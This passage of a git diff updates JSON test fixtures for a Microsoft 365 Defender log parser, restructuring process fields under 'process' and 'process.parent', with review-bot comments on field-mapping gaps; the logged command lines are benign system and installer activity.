+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
+ "FileSize": 56824728,
+ "IntegrityLevel": "Medium",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
+ "VersionInfoInternalFileName": "OneDriveSetup.exe",
+ "VersionInfoOriginalFileName": "OneDriveSetup.exe",
+ "VersionInfoProductName": "Microsoft OneDrive",
+ "VersionInfoProductVersion": "22.166.0807.0002"
+ }
 },
 "type": "FileDeleted"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
new file mode 100644
index 000000000..1a9daafcd
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json 
@@ -0,0 +1,109 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT 
DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe 
/V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - 
Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "file" + ], + "dataset": "device_file_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-08T14:38:51.904876Z", + "action": { + "properties": { + "RequestAccountSid": "S-1-2-3", + "process": { + "CommandLine": "commandexec.exe /V", + "FileSize": 176128, + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows\u00ae installer", + "VersionInfoInternalFileName": "commandexec", + "VersionInfoOriginalFileName": "commandexec.exe", + "VersionInfoProductName": "Windows Installer - Unicode", + "VersionInfoProductVersion": "5.0.22621.3880" + } + }, + "type": "FileCreated" + }, + "file": { + "directory": "C:\\Program Files\\FileName.dll", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "FileName.dll", + "size": 640920 + }, + "host": { + "id": "123456789abcdef", + "name": "device.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "341972" + } + } + }, + "network": { + "protocol": "Local" + }, + "process": { + "args": [ + "/V" + ], + "command_line": "commandexec.exe /V", + "executable": "c:\\windows\\system32\\commandexec.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": 
"44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "commandexec.exe", + "parent": { + "name": "services.exe", + "pid": 888, + "start": "2024-10-09T01:02:27.222708Z" + }, + "pid": 16468, + "start": "2024-11-08T14:38:23.238308Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows\\system32" + }, + "related": { + "hash": [ + "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "9a3af3a9ce0217bccce1d161e0b6bfde" + ], + "user": [ + "Syst\u00e8me" + ] + }, + "user": { + "domain": "ACCOUNT DOMAIN", + "name": "Syst\u00e8me" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json index 497faa7bf..04559806a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json @@ -16,10 +16,12 @@ "@timestamp": "2022-09-01T07:47:58.616127Z", "action": { "properties": { - "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", - "InitiatingProcessFileSize": 66560, - "InitiatingProcessIntegrityLevel": "Medium", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault" + "process": { + "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", + "FileSize": 66560, + "IntegrityLevel": "Medium", + "TokenElevation": "TokenElevationTypeDefault" + } }, "type": "ImageLoaded" }, 
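Review bot: In the new fixture's expected output, `file.directory` is set to the full path `C:\Program Files\FileName.dll` copied from `FolderPath`, which is what ECS defines as `file.path`; `file.directory` should carry only `C:\Program Files`. The same output shows `InitiatingProcessFolderPath` already being split into `process.executable` and `process.working_directory`, so the same split can presumably be applied to `FolderPath` (parser.yml is not in this chunk, so I cannot confirm where the mapping lives) — and note that the value stored as `working_directory` is the image directory, not the process's cwd, which is misleading for anyone reading it as such. Two smaller gaps on the same event: `user.id` is not populated from `RequestAccountSid` although `process.user.id` is populated from `InitiatingProcessAccountSid`, and `related.user` lists only `Système` while the initiating account `système` from `process.user.name` is missing. The new file is also committed without a trailing newline.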
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json index 15dc7a41b..e70edf395 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json @@ -17,9 +17,11 @@ "action": { "properties": { "AccountSid": "S-1-1-11-1-1", - "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession", "LogonId": "111111", - "LogonType": "Interactive" + "LogonType": "Interactive", + "process": { + "CommandLine": "WinLogon.exe -SpecialSession" + } }, "type": "LogonSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json index 348f76f4e..75ab306b8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json 
@@ -16,19 +16,21 @@ "@timestamp": "2023-01-04T14:05:32.314862Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", - "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", - "InitiatingProcessFileSize": 63984520, - "InitiatingProcessIntegrityLevel": "Medium", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel", - "InitiatingProcessVersionInfoInternalFileName": "Excel", - "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft Office", - "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538", "LocalIPType": "Private", - "RemoteIPType": "Public" + "RemoteIPType": "Public", + "process": { + "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", + "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", + "FileSize": 63984520, + "IntegrityLevel": "Medium", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Excel", + "VersionInfoInternalFileName": "Excel", + "VersionInfoOriginalFileName": "Excel.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.15601.20538" + } }, "type": "ConnectionSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json index cd2ca7981..7acf31f01 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json @@ -29,9 +29,11 @@ } }, "process": { - "user": { - "domain": "autorite nt", - "name": "syst\u00e8me" + "parent": { + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" + } } } } 
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 7d72e6264..3847a138b 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json 
@@ -17,25 +17,30 @@ "action": { "properties": { "AccountSid": "S-1-1-11", - "InitiatingProcessCommandLine": "\"MsMpEng.exe\"", - "InitiatingProcessFileSize": 133576, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessLogonId": "999", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable", - "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe", - "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", - "ProcessIntegrityLevel": "System", - "ProcessVersionInfoCompanyName": "Microsoft Corporation", - "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", - "ProcessVersionInfoInternalFileName": "MpCmdRun", - "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe", - "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "ProcessVersionInfoProductVersion": "4.18.2301.6" + "process": { + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", + "VersionInfoInternalFileName": "MpCmdRun", + "VersionInfoOriginalFileName": "MpCmdRun.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "4.18.2301.6", + "parent": { + "CommandLine": "\"MsMpEng.exe\"", + "FileSize": 133576, + "IntegrityLevel": "System", + "LogonId": "999", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Antimalware Service Executable", + "VersionInfoInternalFileName": "MsMpEng.exe", + 
"VersionInfoOriginalFileName": "MsMpEng.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "4.18.2301.6" + } + } }, "type": "ProcessCreated" }, @@ -69,31 +74,33 @@ "54", "Scan" ], - "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" - }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", - "hash": { - "md5": "5d5608654828cf052ba013b3c37cbb61", - "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" - }, - "name": "MsMpEng.exe", + "name": "MpCmdRun.exe", "parent": { - "name": "services.exe", - "pid": 1032, - "start": "2023-01-03T08:51:26.740241Z" + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "\"MsMpEng.exe\"", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" + }, + "name": "MsMpEng.exe", + "pid": 5456, + "start": "2023-01-03T08:51:29.269279Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "pid": 37788, "start": "2023-01-04T14:15:10.355033Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0" }, "related": { "hash": [ 
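Review bot: On the new side of the `process` block, `command_line` is followed directly by `name`, so `process.executable` and `process.hash.*` are no longer populated for the created process (`MpCmdRun.exe`): the removed lines held the initiating process's path and hashes, which now correctly sit under `process.parent`, but nothing replaced them with the created process's `FolderPath` / `MD5` / `SHA1` / `SHA256`. Detection content keyed on `process.executable` or `process.hash.sha256` for `ProcessCreated` events would then only ever see the parent; the expected output should gain an `"executable"` and a `"hash"` object between `command_line` and `name` (keys in these fixtures appear sorted, which is how I read the absence — the `process` object starts above this hunk, so please confirm). Separately, the grandparent (`services.exe`, pid 1032, from `InitiatingProcessParentFileName`/`InitiatingProcessParentId`/`InitiatingProcessParentCreationTime`) appears nowhere in the new `process` object, so the visible ancestry chain shrinks from three levels to two; keeping it, e.g. under `process.parent.parent`, would preserve what parent-chain rules relied on before this change.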
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index d2e83b32a..cac1e9791 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json 
@@ -1,9 +1,15 @@ { "input": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, 
\"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, 
\"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming 
traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating 
